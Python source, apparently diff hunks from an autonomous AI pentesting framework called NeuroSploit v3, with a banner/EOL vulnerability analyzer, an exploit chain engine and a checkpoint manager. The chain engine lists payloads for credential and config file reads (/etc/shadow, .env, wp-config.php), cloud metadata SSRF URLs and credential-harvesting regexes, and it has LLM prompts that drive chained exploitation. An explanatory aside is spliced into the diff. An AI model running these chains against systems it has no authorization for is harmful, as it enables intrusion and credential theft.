"php": ["4.", "5.", "7.0", "7.1", "7.2", "7.3", "7.4", "8.0"],
"python": ["2.", "3.0", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7"],
"node": ["8.", "10.", "12.", "14.", "15.", "16.", "17.", "19."],
"django": ["1.", "2.0", "2.1", "2.2", "3.0", "3.1"],
"rails": ["4.", "5.0", "5.1", "5.2", "6.0"],
"angular": ["1.", "2.", "4.", "5.", "6.", "7.", "8.", "9.", "10.", "11."],
"jquery": ["1.", "2."],
"wordpress": ["3.", "4."],
"apache": ["2.2.", "2.0.", "1.3."],
"nginx": ["1.14.", "1.16.", "1.17."],
"openssl": ["0.", "1.0.", "1.1.0"],
"tomcat": ["6.", "7.", "8.0."],
"dotnet": ["1.", "2.", "3.0", "3.1", "5."],
"java": ["6.", "7.", "8.", "9.", "10.", "11."],
"laravel": ["5.", "6.", "7."],
"express": ["3.", "2.", "1."],
"drupal": ["6.", "7.", "8."],
"iis": ["6.", "7.", "7.5", "8."],
"elasticsearch": ["1.", "2.", "5.", "6."],
}
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def analyze(self, version_info: List[Dict]) -> List[BannerFinding]:
"""Analyse a list of detected software/version dicts.
Each dict should contain at minimum ``software`` and ``version`` keys.
Returns a list of :class:`BannerFinding` sorted by severity
(critical first).
"""
findings: List[BannerFinding] = []
for entry in version_info:
software = str(entry.get("software", "")).strip().lower()
version = str(entry.get("version", "")).strip()
if not software or not version:
continue
# --- exact match ---
key = f"{software}/{version}"
vuln = self.KNOWN_VULNS.get(key)
if vuln:
findings.append(self._to_finding(software, version, vuln, "exact"))
# --- prefix match (catches minor-version ranges) ---
# Match only on "." or "-" boundaries so that "2.4.4" does not
# match the "2.4.49" entry through a raw string prefix.
for known_key, known_vuln in self.KNOWN_VULNS.items():
if known_key == key:
continue # already handled
ks, kv = known_key.split("/", 1)
if ks == software and (
version.startswith((kv + ".", kv + "-")) or kv.startswith(version + ".")
):
findings.append(self._to_finding(software, version, known_vuln, "prefix"))
# --- EOL check ---
if self.is_eol(software, version):
findings.append(BannerFinding(
software=software,
version=version,
cve="N/A",
vuln_type="eol_software",
severity="medium",
description=f"{software} {version} has reached end-of-life and no longer receives security updates.",
source="banner_analyzer:eol_check",
))
# Deduplicate by (software, version, cve)
seen: set = set()
unique: List[BannerFinding] = []
for f in findings:
ident = (f.software, f.version, f.cve)
if ident not in seen:
seen.add(ident)
unique.append(f)
unique.sort(key=lambda f: _SEVERITY_ORDER.get(f.severity, 99))
return unique
def is_eol(self, software: str, version: str) -> bool:
"""Return True if *version* matches an end-of-life prefix for *software*."""
software = software.strip().lower()
version = version.strip()
prefixes = self.EOL_VERSIONS.get(software, [])
return any(version.startswith(p) for p in prefixes)
@staticmethod
def check_version_range(
software: str,
version: str,
min_affected: str,
max_fixed: str,
) -> bool:
"""Return True if *version* falls within [min_affected, max_fixed).
Uses tuple comparison on integer version parts so that
``"2.4.49" >= "2.4.49"`` and ``"2.4.49" < "2.4.52"`` hold.
"""
def _parse(v: str) -> Tuple[int, ...]:
parts: List[int] = []
for segment in v.split("."):
# Strip non-numeric suffixes (e.g. "3.0.0-beta")
num = ""
for ch in segment:
if ch.isdigit():
num += ch
else:
break
parts.append(int(num) if num else 0)
return tuple(parts)
try:
v = _parse(version)
lo = _parse(min_affected)
hi = _parse(max_fixed)
return lo <= v < hi
except (ValueError, TypeError):
return False
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
@staticmethod
def _to_finding(
software: str,
version: str,
vuln: Dict,
match_type: str,
) -> BannerFinding:
return BannerFinding(
software=software,
version=version,
cve=vuln["cve"],
vuln_type=vuln["type"],
severity=vuln["severity"],
description=vuln["description"],
source=f"banner_analyzer:known_vulns:{match_type}",
)
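The prefix matching and `check_version_range` logic above both depend on how version strings are compared. The sketch below illustrates, under stated assumptions, two details that are easy to get wrong: raw string prefixes conflate `2.4.4` with `2.4.49`, and tuples of unequal length compare unexpectedly unless padded. The helper names `parse_version`, `is_component_prefix` and `in_range` are hypothetical and are not the module's API.

```python
from typing import Tuple


def parse_version(v: str) -> Tuple[int, ...]:
    """Parse "2.4.49-debian" into (2, 4, 49), ignoring non-numeric suffixes."""
    parts = []
    for segment in v.split("."):
        digits = ""
        for ch in segment:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_component_prefix(shorter: str, longer: str) -> bool:
    """True if every numeric component of `shorter` leads `longer`."""
    a, b = parse_version(shorter), parse_version(longer)
    return len(a) <= len(b) and b[:len(a)] == a


def in_range(version: str, min_affected: str, fixed_in: str) -> bool:
    """True if min_affected <= version < fixed_in, after zero-padding."""
    parsed = [parse_version(x) for x in (version, min_affected, fixed_in)]
    width = max(len(p) for p in parsed)
    # Pad so that "2.4" and "2.4.0" compare as equal.
    v, lo, hi = (p + (0,) * (width - len(p)) for p in parsed)
    return lo <= v < hi


if __name__ == "__main__":
    print("2.4.49".startswith("2.4.4"))            # raw string prefix
    print(is_component_prefix("2.4.4", "2.4.49"))  # component-wise prefix
    print(in_range("2.4", "2.4.0", "2.4.1"))
```

Range checks of this kind could replace per-version keys in a table such as `KNOWN_VULNS`, at the cost of maintaining accurate affected and fixed bounds for each CVE.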
@@ -1,872 +0,0 @@
"""
NeuroSploit v3 - Exploit Chain Engine
Finding correlation, derived target generation, and attack graph
construction for autonomous pentesting. When a vulnerability is
confirmed, this engine generates follow-up targets based on 10
chain rules.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Optional
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class ChainableTarget:
"""A derived attack target generated from a confirmed finding."""
url: str
param: str
vuln_type: str
context: Dict[str, Any] = field(default_factory=dict)
chain_depth: int = 1
parent_finding_id: str = ""
priority: int = 2 # 1=critical, 2=high, 3=medium
method: str = "GET"
injection_point: str = "parameter"
payload_hint: Optional[str] = None
description: str = ""
@dataclass
class ChainRule:
"""Defines how a finding triggers derived targets."""
trigger_type: str # Vuln type that triggers this rule
derived_types: List[str] # Types to test on derived targets
extraction_fn: str # Method name for target extraction
priority: int = 2
max_depth: int = 3
description: str = ""
# 10 chain rules
CHAIN_RULES: List[ChainRule] = [
ChainRule(
trigger_type="ssrf",
derived_types=["lfi", "xxe", "command_injection", "ssrf"],
extraction_fn="_extract_internal_urls",
priority=1,
description="SSRF \u2192 internal service attacks",
),
ChainRule(
trigger_type="sqli_error",
derived_types=["sqli_union", "sqli_blind", "sqli_time"],
extraction_fn="_extract_db_context",
priority=1,
description="SQLi error \u2192 advanced SQLi techniques",
),
ChainRule(
trigger_type="information_disclosure",
derived_types=["auth_bypass", "default_credentials"],
extraction_fn="_extract_credentials",
priority=1,
description="Info disclosure \u2192 credential-based attacks",
),
ChainRule(
trigger_type="idor",
derived_types=["idor", "bola", "bfla"],
extraction_fn="_extract_idor_patterns",
priority=2,
description="IDOR on one resource \u2192 same pattern on sibling resources",
),
ChainRule(
trigger_type="lfi",
derived_types=["sqli", "auth_bypass", "information_disclosure"],
extraction_fn="_extract_config_paths",
priority=1,
description="LFI \u2192 config file extraction \u2192 credential discovery",
),
ChainRule(
trigger_type="xss_reflected",
derived_types=["xss_stored", "cors_misconfiguration"],
extraction_fn="_extract_xss_chain",
priority=2,
description="Reflected XSS \u2192 stored XSS / CORS chain for session theft",
),
ChainRule(
trigger_type="open_redirect",
derived_types=["ssrf", "oauth_misconfiguration"],
extraction_fn="_extract_redirect_chain",
priority=1,
description="Open redirect \u2192 OAuth token theft chain",
),
ChainRule(
trigger_type="default_credentials",
derived_types=["auth_bypass", "privilege_escalation", "idor"],
extraction_fn="_extract_auth_chain",
priority=1,
description="Default creds \u2192 authenticated attacks",
),
ChainRule(
trigger_type="exposed_admin_panel",
derived_types=["default_credentials", "auth_bypass", "brute_force"],
extraction_fn="_extract_admin_chain",
priority=1,
description="Exposed admin \u2192 credential attack on admin panel",
),
ChainRule(
trigger_type="subdomain_takeover",
derived_types=["xss_reflected", "xss_stored", "ssrf"],
extraction_fn="_extract_subdomain_targets",
priority=3,
description="Subdomain takeover \u2192 new attack surface",
),
]
class ChainEngine:
"""Exploit chain engine for finding correlation and derived target generation.
When a vulnerability is confirmed, this engine:
1. Checks chain rules for matching trigger types
2. Extracts derived targets using rule-specific extraction functions
3. Generates ChainableTarget objects for the agent to test
4. Tracks chain depth to prevent infinite recursion
5. Builds an attack graph of finding \u2192 finding relationships
Usage:
engine = ChainEngine()
derived = await engine.on_finding(finding, recon, memory)
for target in derived:
# Test target through normal vuln testing pipeline
pass
"""
MAX_CHAIN_DEPTH = 3
MAX_DERIVED_PER_FINDING = 20
def __init__(self, llm=None):
self.llm = llm
self._chain_graph: Dict[str, List[str]] = {} # finding_id → ["vuln_type:url", ...] for derived targets
self._total_chains = 0
self._chain_findings: List[str] = [] # finding IDs that came from chaining
async def on_finding(
self,
finding: Any,
recon: Any = None,
memory: Any = None,
) -> List[ChainableTarget]:
"""Process a confirmed finding and generate derived targets.
Args:
finding: The confirmed Finding object
recon: ReconData with target info
memory: AgentMemory for dedup
Returns:
List of ChainableTarget objects to test
"""
vuln_type = getattr(finding, "vulnerability_type", "")
finding_id = getattr(finding, "id", str(id(finding)))
chain_depth = getattr(finding, "_chain_depth", 0)
# Prevent infinite chaining
if chain_depth >= self.MAX_CHAIN_DEPTH:
return []
derived_targets = []
for rule in CHAIN_RULES:
# Check trigger match (exact or prefix)
if not self._matches_trigger(vuln_type, rule.trigger_type):
continue
# Extract targets using rule's extraction function
extractor = getattr(self, rule.extraction_fn, None)
if not extractor:
continue
try:
targets = extractor(finding, recon)
for target in targets[:self.MAX_DERIVED_PER_FINDING]:
target.chain_depth = chain_depth + 1
target.parent_finding_id = finding_id
target.priority = rule.priority
derived_targets.append(target)
except Exception as e:
logger.debug(f"Chain extraction failed for {rule.extraction_fn}: {e}")
# Enforce the global cap first, so the graph and counters only
# reflect targets that are actually returned.
derived_targets = derived_targets[:self.MAX_DERIVED_PER_FINDING]
# Track in graph
if derived_targets:
self._chain_graph[finding_id] = [
f"{t.vuln_type}:{t.url}" for t in derived_targets
]
self._total_chains += len(derived_targets)
logger.debug(f"Chain engine: {vuln_type} \u2192 {len(derived_targets)} derived targets")
return derived_targets
def _matches_trigger(self, vuln_type: str, trigger: str) -> bool:
"""Check if vuln_type matches a trigger rule."""
if vuln_type == trigger:
return True
# Allow prefix matching in either direction: "xss" matches the
# "xss_reflected" trigger, and "ssrf_blind" matches the "ssrf" trigger
if vuln_type.startswith(trigger + "_") or trigger.startswith(vuln_type + "_"):
return True
# Special: any sqli variant triggers sqli_error rule
if trigger == "sqli_error" and vuln_type.startswith("sqli"):
return True
return False
# ─── Extraction Functions ───────────────────────────────────────────
def _extract_internal_urls(self, finding, recon) -> List[ChainableTarget]:
"""From SSRF: extract internal URLs for further attack."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Find internal IPs in response
internal_patterns = [
r'(?:https?://)?(?:127\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:10\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:192\.168\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?localhost(?::\d+)?(?:/[^\s"<>]*)?',
]
found_urls = set()
for pattern in internal_patterns:
for match in re.finditer(pattern, evidence):
internal_url = match.group(0)
if not internal_url.startswith("http"):
internal_url = f"http://{internal_url}"
found_urls.add(internal_url)
# No internal URLs in the evidence: fall back to common loopback service ports
if not found_urls:
base_ips = ["127.0.0.1", "localhost"]
ports = [80, 8080, 8443, 3000, 5000, 8000, 9200, 6379, 27017]
for ip in base_ips:
for port in ports[:4]: # Limit to the first four ports
found_urls.add(f"http://{ip}:{port}/")
for internal_url in list(found_urls)[:10]:
for vuln_type in ["lfi", "command_injection", "ssrf"]:
targets.append(ChainableTarget(
url=internal_url,
param="url",
vuln_type=vuln_type,
context={"source": "ssrf_chain", "internal": True},
description=f"SSRF chain: {vuln_type} on internal {internal_url}",
))
return targets
def _extract_db_context(self, finding, recon) -> List[ChainableTarget]:
"""From SQLi error: extract DB type and generate advanced payloads."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Detect database type from error
db_type = "unknown"
db_indicators = {
"mysql": ["mysql", "mariadb", "you have an error in your sql syntax"],
"postgresql": ["postgresql", "pg_", "unterminated quoted string"],
"mssql": ["microsoft sql", "mssql", "unclosed quotation mark", "sqlserver"],
"oracle": ["ora-", "oracle", "quoted string not properly terminated"],
"sqlite": ["sqlite", "sqlite3"],
}
evidence_lower = evidence.lower()
for db, indicators in db_indicators.items():
if any(i in evidence_lower for i in indicators):
db_type = db
break
# Generate type-specific advanced SQLi targets
advanced_types = ["sqli_union", "sqli_blind", "sqli_time"]
for vuln_type in advanced_types:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type=vuln_type,
context={"db_type": db_type, "source": "sqli_chain"},
description=f"SQLi chain: {vuln_type} ({db_type}) on {param}",
payload_hint=f"db_type={db_type}",
))
return targets
def _extract_credentials(self, finding, recon) -> List[ChainableTarget]:
"""From info disclosure: extract credentials for auth attacks."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Extract potential credentials
cred_patterns = [
r'(?:password|passwd|pwd)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:api_key|apikey|api-key)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:token|secret|auth)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:username|user|login)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
]
found_creds = {}
for pattern in cred_patterns:
matches = re.findall(pattern, evidence, re.I)
for match in matches:
if len(match) > 3: # Skip trivial matches
# Key by the first alternative in the pattern, e.g. "password"
found_creds[pattern.split("|")[0].removeprefix("(?:")] = match
# Generate auth attack targets
if recon:
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
admin_paths = ["/admin", "/api/admin", "/dashboard", "/management"]
for path in admin_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="auth_bypass",
context={"discovered_creds": found_creds, "source": "info_disclosure_chain"},
description=f"Credential chain: auth bypass at {path}",
))
return targets
def _extract_idor_patterns(self, finding, recon) -> List[ChainableTarget]:
"""From IDOR: apply same pattern to sibling resources."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
path = parsed.path
# Pattern: /users/{id} → /orders/{id}, /profiles/{id}
sibling_resources = [
"users", "orders", "profiles", "accounts", "invoices",
"documents", "messages", "transactions", "settings",
"notifications", "payments", "subscriptions",
]
# Extract the resource pattern
path_parts = [p for p in path.split("/") if p]
if len(path_parts) >= 2:
# Replace the resource name with siblings
original_resource = path_parts[-2] if path_parts[-1].isdigit() else path_parts[-1]
resource_id = path_parts[-1] if path_parts[-1].isdigit() else "1"
base = f"{parsed.scheme}://{parsed.netloc}"
for sibling in sibling_resources:
if sibling != original_resource:
new_path = path.replace(original_resource, sibling)
targets.append(ChainableTarget(
url=f"{base}{new_path}",
param=param or "id",
vuln_type="idor",
context={"source": "idor_pattern_chain", "original_resource": original_resource},
description=f"IDOR chain: {sibling} (from {original_resource})",
method=getattr(finding, "method", "GET"),
))
return targets[:10]
def _extract_config_paths(self, finding, recon) -> List[ChainableTarget]:
"""From LFI: generate config file read targets."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Config files that may contain credentials
config_files = [
"/etc/passwd",
"/etc/shadow",
"../../../../.env",
"../../../../config/database.yml",
"../../../../wp-config.php",
"../../../../config.php",
"../../../../.git/config",
"../../../../config/secrets.yml",
"/proc/self/environ",
"../../../../application.properties",
"../../../../appsettings.json",
"../../../../web.config",
]
for config_path in config_files:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="lfi",
context={"config_file": config_path, "source": "lfi_chain"},
description=f"LFI chain: read {config_path}",
payload_hint=config_path,
))
return targets
def _extract_xss_chain(self, finding, recon) -> List[ChainableTarget]:
"""From reflected XSS: look for stored XSS and CORS chain opportunities."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Look for form submission endpoints (potential stored XSS)
if recon and hasattr(recon, "forms"):
for form in getattr(recon, "forms", [])[:5]:
form_url = form.get("action", "") if isinstance(form, dict) else getattr(form, "action", "")
if form_url:
targets.append(ChainableTarget(
url=form_url,
param=param,
vuln_type="xss_stored",
context={"source": "xss_chain"},
description=f"XSS chain: stored XSS via form at {form_url}",
method="POST",
))
# Check for CORS misconfiguration chain
targets.append(ChainableTarget(
url=base + "/api/",
param="",
vuln_type="cors_misconfiguration",
context={"source": "xss_cors_chain"},
description="XSS+CORS chain: check CORS for session theft scenario",
))
return targets
def _extract_redirect_chain(self, finding, recon) -> List[ChainableTarget]:
"""From open redirect: chain to OAuth token theft."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# OAuth endpoints to test
oauth_paths = [
"/oauth/authorize", "/auth/authorize", "/oauth2/authorize",
"/connect/authorize", "/.well-known/openid-configuration",
"/api/oauth/callback",
]
for path in oauth_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="redirect_uri",
vuln_type="open_redirect",
context={"source": "redirect_oauth_chain"},
description=f"Redirect chain: OAuth token theft via {path}",
))
# SSRF via redirect
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="ssrf",
context={"source": "redirect_ssrf_chain"},
description="Redirect → SSRF chain",
))
return targets
def _extract_auth_chain(self, finding, recon) -> List[ChainableTarget]:
"""From default credentials: test all endpoints as authenticated user."""
targets = []
url = getattr(finding, "url", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Privileged paths to test with obtained session
privileged_paths = [
"/admin", "/admin/users", "/admin/settings",
"/api/admin", "/api/users", "/api/v1/admin",
"/management", "/internal", "/debug",
]
for path in privileged_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="privilege_escalation",
context={"source": "auth_chain", "authenticated": True},
description=f"Auth chain: privilege escalation at {path}",
))
return targets
def _extract_admin_chain(self, finding, recon) -> List[ChainableTarget]:
"""From exposed admin panel: try default credentials and auth bypass."""
targets = []
url = getattr(finding, "url", "")
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="default_credentials",
context={"source": "admin_chain"},
description=f"Admin chain: default credentials at {url}",
))
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="auth_bypass",
context={"source": "admin_chain"},
description=f"Admin chain: auth bypass at {url}",
))
return targets
def _extract_subdomain_targets(self, finding, recon) -> List[ChainableTarget]:
"""From subdomain discovery: add as new attack targets."""
targets = []
evidence = getattr(finding, "evidence", "")
# Extract subdomains from evidence
subdomain_pattern = r'(?:https?://)?([a-zA-Z0-9][-a-zA-Z0-9]*\.[-a-zA-Z0-9.]+)'
found_domains = set(re.findall(subdomain_pattern, evidence))
for domain in list(found_domains)[:5]:
# The capture group never includes the scheme, so always add one
# (a startswith("http") check would misfire on hosts like "httpbin.org").
domain_url = f"https://{domain}"
targets.append(ChainableTarget(
url=domain_url,
param="",
vuln_type="xss_reflected",
context={"source": "subdomain_chain"},
description=f"Subdomain chain: test {domain}",
priority=3,
))
return targets
# ─── AI Correlation ─────────────────────────────────────────────────
async def ai_correlate(self, findings: List[Any], llm=None) -> List[Dict]:
"""AI-driven correlation of multiple findings into attack chains.
Analyzes all findings together to identify multi-step attack scenarios.
"""
llm = llm or self.llm
if not llm or not hasattr(llm, "generate"):
return []
if len(findings) < 2:
return []
try:
findings_summary = []
for f in findings[:20]:
findings_summary.append(
f"- {getattr(f, 'vulnerability_type', '?')}: "
f"{getattr(f, 'url', '?')} "
f"(param: {getattr(f, 'parameter', '?')}, "
f"confidence: {getattr(f, 'confidence_score', '?')})"
)
prompt = f"""Analyze these confirmed vulnerability findings for potential exploit chains.
FINDINGS:
{chr(10).join(findings_summary)}
For each chain you identify, describe:
1. The attack scenario (2-3 sentences)
2. Which findings are linked
3. The impact if chained together
4. Priority (critical/high/medium)
Return ONLY realistic chains where one finding directly enables or amplifies another.
If no meaningful chains exist, say "No chains identified."
Format each chain as: CHAIN: [scenario] | FINDINGS: [types] | IMPACT: [impact] | PRIORITY: [level]"""
result = await llm.generate(prompt)
if not result:
return []
# Parse chains
chains = []
for line in result.strip().split("\n"):
line = line.strip()  # tolerate indented or padded model output
if line.startswith("CHAIN:"):
parts = line.split("|")
chain = {
"scenario": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
"findings": parts[1].replace("FINDINGS:", "").strip() if len(parts) > 1 else "",
"impact": parts[2].replace("IMPACT:", "").strip() if len(parts) > 2 else "",
"priority": parts[3].replace("PRIORITY:", "").strip() if len(parts) > 3 else "medium",
}
chains.append(chain)
return chains
except Exception as e:
logger.debug(f"AI chain correlation failed: {e}")
return []
# ─── Reporting ──────────────────────────────────────────────────────
def get_attack_graph(self) -> Dict[str, List[str]]:
"""Get the attack chain graph."""
return dict(self._chain_graph)
def get_chain_stats(self) -> Dict:
"""Get chain statistics for reporting."""
return {
"total_chains_generated": self._total_chains,
"graph_nodes": len(self._chain_graph),
"chain_findings": len(self._chain_findings),
}
# ── AI-Driven Chain Discovery (Phase 4 Extension) ──────────────────
async def ai_discover_chains(
self,
findings: List[Any],
recon: Any = None,
llm=None,
budget=None,
) -> List[Dict]:
"""Use AI to discover non-obvious exploit chains.
Goes beyond rule-based chaining to identify multi-step
attack paths that require reasoning about the application.
"""
llm = llm or self.llm
if not llm or not hasattr(llm, "generate"):
return []
if len(findings) < 2:
return []
if budget and not budget.can_spend("analysis", 800):
return []
try:
findings_detail = []
for f in findings[:25]:
findings_detail.append({
"type": getattr(f, "vulnerability_type", ""),
"url": getattr(f, "affected_endpoint", getattr(f, "url", "")),
"param": getattr(f, "parameter", ""),
"confidence": getattr(f, "confidence_score", 0),
"evidence_snippet": str(getattr(f, "evidence", ""))[:150],
})
tech_info = ""
if recon:
techs = getattr(recon, "technologies", [])
if techs:
tech_info = f"\nDETECTED TECHNOLOGIES: {', '.join(techs[:10])}"
prompt = f"""You are an expert penetration tester analyzing confirmed findings for multi-step attack chains.
CONFIRMED FINDINGS:
{chr(10).join(f" {i+1}. [{f['type']}] {f['url']} (param: {f['param']}, confidence: {f['confidence']})" for i, f in enumerate(findings_detail))}
{tech_info}
Identify REALISTIC multi-step attack chains where one finding DIRECTLY enables exploiting another.
For each chain:
1. List the steps (which findings connect and how)
2. The final impact (what an attacker achieves)
3. Required conditions (what must be true)
4. Priority: critical/high/medium
IMPORTANT: Only propose chains where there is a CLEAR causal link between steps.
Do NOT invent chains that are merely thematic groupings.
Format each chain as:
CHAIN: [step1 type] -> [step2 type] -> ... | IMPACT: [final impact] | STEPS: [brief description of each step] | PRIORITY: [level]"""
result = await llm.generate(prompt)
if budget:
budget.record("analysis", 800, "ai_chain_discovery")
if not result:
return []
chains = []
for line in result.strip().split("\n"):
line = line.strip()
if not line.startswith("CHAIN:"):
continue
parts = line.split("|")
chain = {
"chain": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
"impact": "",
"steps": "",
"priority": "medium",
}
for part in parts[1:]:
part = part.strip()
if part.startswith("IMPACT:"):
chain["impact"] = part.replace("IMPACT:", "").strip()
elif part.startswith("STEPS:"):
chain["steps"] = part.replace("STEPS:", "").strip()
elif part.startswith("PRIORITY:"):
chain["priority"] = part.replace("PRIORITY:", "").strip().lower()
if chain["chain"]:
chains.append(chain)
logger.info(f"AI chain discovery: found {len(chains)} chains")
return chains
except Exception as e:
logger.debug(f"AI chain discovery failed: {e}")
return []
async def execute_chain(
self,
chain_targets: List[ChainableTarget],
test_fn,
) -> Dict:
"""Attempt to execute a multi-step exploit chain.
Args:
chain_targets: Ordered list of chain targets (step 1, 2, ...)
test_fn: Async callable(url, param, vuln_type, payload_hint) -> Finding or None
Returns:
Dict with chain execution results.
"""
results = {
"steps_total": len(chain_targets),
"steps_completed": 0,
"steps_succeeded": 0,
"chain_complete": False,
"findings": [],
"error": None,
}
prev_result = None
for i, target in enumerate(chain_targets):
try:
# Pass context from previous step
if prev_result and hasattr(target, "context"):
target.context["prev_step_result"] = str(prev_result)[:500]
finding = await test_fn(
target.url,
target.param,
target.vuln_type,
target.payload_hint,
)
results["steps_completed"] += 1
if finding:
results["steps_succeeded"] += 1
results["findings"].append(finding)
prev_result = finding
# Mark finding as part of chain
if hasattr(finding, "_chain_depth"):
finding._chain_depth = target.chain_depth
else:
# Chain broken — stop here
logger.debug(
f"Chain broken at step {i+1}/{len(chain_targets)}: "
f"{target.vuln_type} on {target.url}"
)
break
except Exception as e:
results["error"] = str(e)
logger.debug(f"Chain execution error at step {i+1}: {e}")
break
results["chain_complete"] = (
results["steps_succeeded"] == results["steps_total"]
)
return results
def eager_chain_targets(self, signal: Dict) -> List[ChainableTarget]:
"""Generate chain targets from intermediate signals (before full confirmation).
Called DURING testing when a single signal is detected but before
the full validation pipeline confirms it. Enables faster chain discovery.
Args:
signal: Dict with keys: vuln_type, url, param, status, evidence_snippet
Returns:
List of high-priority chain targets to test immediately.
"""
vuln_type = signal.get("vuln_type", "")
url = signal.get("url", "")
param = signal.get("param", "")
evidence = signal.get("evidence_snippet", "")
targets = []
# SSRF signal → immediately try cloud metadata
if vuln_type in ("ssrf", "ssrf_cloud"):
metadata_urls = [
"http://169.254.169.254/latest/meta-data/",
"http://metadata.google.internal/computeMetadata/v1/",
"http://169.254.169.254/metadata/instance",
]
for meta_url in metadata_urls:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="ssrf_cloud",
payload_hint=meta_url,
priority=1,
description=f"Eager: SSRF → cloud metadata ({meta_url})",
context={"source": "eager_chain", "target_url": meta_url},
))
# SQLi signal → immediately try UNION-based extraction
elif vuln_type.startswith("sqli"):
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="sqli_union",
priority=1,
description="Eager: SQLi → UNION extraction",
context={"source": "eager_chain", "db_evidence": evidence[:200]},
))
# LFI signal → immediately try sensitive files
elif vuln_type in ("lfi", "path_traversal", "arbitrary_file_read"):
sensitive_files = [
"../../../../.env",
"/etc/shadow",
"/proc/self/environ",
]
for fpath in sensitive_files:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="lfi",
payload_hint=fpath,
priority=1,
description=f"Eager: LFI → {fpath}",
context={"source": "eager_chain"},
))
# Info disclosure → auth chain
elif vuln_type == "information_disclosure":
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
targets.append(ChainableTarget(
url=f"{base}/admin",
param="",
vuln_type="auth_bypass",
priority=2,
description="Eager: Info disclosure → admin auth bypass",
context={"source": "eager_chain"},
))
return targets
@@ -1,123 +0,0 @@
"""
NeuroSploit v3 - Scan Checkpoint Manager
Save and restore agent state to JSON for crash-resilient session persistence.
Checkpoints are stored in data/checkpoints/{scan_id}.json.
"""
import json
import logging
import os
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
CHECKPOINT_DIR = Path(__file__).parent.parent.parent / "data" / "checkpoints"
class CheckpointManager:
"""Manages save/restore of agent scan state to disk."""
def __init__(self, scan_id: str):
self.scan_id = scan_id
self._filepath = CHECKPOINT_DIR / f"{scan_id}.json"
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
def save(self, state: Dict[str, Any]) -> bool:
"""Atomically save checkpoint state to disk.
State typically includes:
- target, mode, scan_type
- progress, phase
- recon_data (endpoints, tech_stack)
- findings (serialized)
- test_targets (serialized)
- junior_tested_types
- completed_vuln_types
- timestamp
"""
try:
state["_checkpoint_version"] = 1
state["_scan_id"] = self.scan_id
state["_timestamp"] = time.time()
tmp_path = self._filepath.with_suffix(".tmp")
with open(tmp_path, "w") as f:
json.dump(state, f, indent=2, default=str)
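# replace() overwrites an existing checkpoint on every platform;
# rename() raises on Windows when the target already exists.
tmp_path.replace(self._filepath)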
logger.debug(f"Checkpoint saved for scan {self.scan_id}")
return True
except Exception as e:
logger.warning(f"Failed to save checkpoint for {self.scan_id}: {e}")
return False
def load(self) -> Optional[Dict[str, Any]]:
"""Load checkpoint from disk, returns None if not found or corrupt."""
if not self._filepath.exists():
return None
try:
with open(self._filepath) as f:
data = json.load(f)
if data.get("_scan_id") != self.scan_id:
logger.warning(f"Checkpoint scan_id mismatch: {data.get('_scan_id')} != {self.scan_id}")
return None
logger.info(f"Checkpoint loaded for scan {self.scan_id} (saved at {data.get('_timestamp', '?')})")
return data
except Exception as e:
logger.warning(f"Failed to load checkpoint for {self.scan_id}: {e}")
return None
def delete(self):
"""Remove checkpoint file after successful completion."""
try:
if self._filepath.exists():
self._filepath.unlink()
logger.debug(f"Checkpoint deleted for scan {self.scan_id}")
except Exception as e:
logger.warning(f"Failed to delete checkpoint for {self.scan_id}: {e}")
@property
def exists(self) -> bool:
"""Check if a checkpoint exists for this scan."""
return self._filepath.exists()
@staticmethod
def list_checkpoints() -> List[Dict[str, Any]]:
"""List all available checkpoints for the resume UI."""
CHECKPOINT_DIR.mkdir(parents=True, exist_ok=True)
checkpoints = []
for f in CHECKPOINT_DIR.glob("*.json"):
try:
with open(f) as fp:
data = json.load(fp)
checkpoints.append({
